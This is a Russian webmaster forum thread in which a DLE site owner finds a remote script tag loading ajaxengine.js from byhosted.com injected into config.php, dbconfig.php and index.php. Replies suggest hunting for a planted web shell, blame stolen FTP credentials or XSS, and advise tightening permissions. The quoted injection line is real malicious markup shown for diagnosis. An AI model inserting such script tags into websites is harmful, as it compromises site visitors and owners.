Вирус на DLE <script src="http://byhosted.com/ajaxengine.js"></script>

12
31day
На сайте с 31.10.2008
Offline
28
2754

Добрый день!

Сегодня столкнулся с тем, что не работает RSS, в поисках проблемы наткнулся на то, что в config.php, dbconfig.php и index.php прописан вот такой код -

<script src="http://byhosted.com/ajaxengine.js"></script>

Файлы естественно почистил, но не уверен, что очистил все.

Кто сталкивался с таким?

R
На сайте с 24.01.2008
Offline
180
#1

Я по практике скажу, многие сталкиваются, если поставили значит постаят еще.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
danmaster
На сайте с 04.02.2007
Offline
290
#2
31day:
Добрый день!

Сегодня столкнулся с тем, что не работает RSS, в поисках проблемы наткнулся на то, что в config.php, dbconfig.php и index.php прописан вот такой код -

Файлы естественно почистил, но не уверен, что очистил все.
Кто сталкивался с таким?

Многие сталкивались. Ищи куда они шелл воткнули (shell by orb чаще всего)

angr
На сайте с 11.05.2006
Offline
413
#3

31day, вы хоть читайте соседние топики...

Требуется СЕО-Специалист в Кишиневе, в офис. ()
31day
На сайте с 31.10.2008
Offline
28
#4

angr, я читал. Про ДЛЕ ничего то не сказано было.

А файлы какие еще могут быть заражены? Кто с таким сталкивался?

angr
На сайте с 11.05.2006
Offline
413
#5

31day, чукча не читатель - чукча пеЙсатель

при чем здесь ваш ДЛЕ, сносите нафиг свой Тотал и больше им никогда не пользуйтесь

в указанной мной теме есть не мало рекомендаций...

R
На сайте с 22.06.2007
Offline
174
#6

А как себя проявляет вирус?

e16r
На сайте с 03.02.2009
Offline
139
#7
Reise:
А как себя проявляет вирус?

🤪 он, сцуко, доставляет неудобства.

Его владельцы, наверняка не хотят чужим сайта ничё хорошего.

Продам ссылки (http://www.maultalk.com/topic132534.html) - стройка, туризм, авто, женские, Subscribe (http://www.maultalk.com/topic195802.html) Пишу статьи и новости (http://www.maultalk.com/topic75993s0.html)
[Удален]
#8

Блин. У меня Joomla 1.6. Тоже залез.

Q
На сайте с 14.11.2010
Offline
5
#9

Простая xss, говно-сайты значит братья у вас, что даже скрипту дали заработать, это сделано было с помощью гостевых книг, форумов, и т.п.

admins.name
asto
На сайте с 13.10.2005
Offline
180
#10
31day:
Добрый день!

Сегодня столкнулся с тем, что не работает RSS, в поисках проблемы наткнулся на то, что в config.php, dbconfig.php и index.php прописан вот такой код -

Файлы естественно почистил, но не уверен, что очистил все.
Кто сталкивался с таким?

Закройте доступ на изменение этих страниц на сервере, права доступа соответствующие выставить надо и ищите виря, ну и мочите его, гада такого:) Обычно такие вири во все index.* файлы пихаются, поэтому посоветовал бы полазить по серверу и поискать такие файлы, может быть в них тоже позапихивали js скрипт с вирем.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий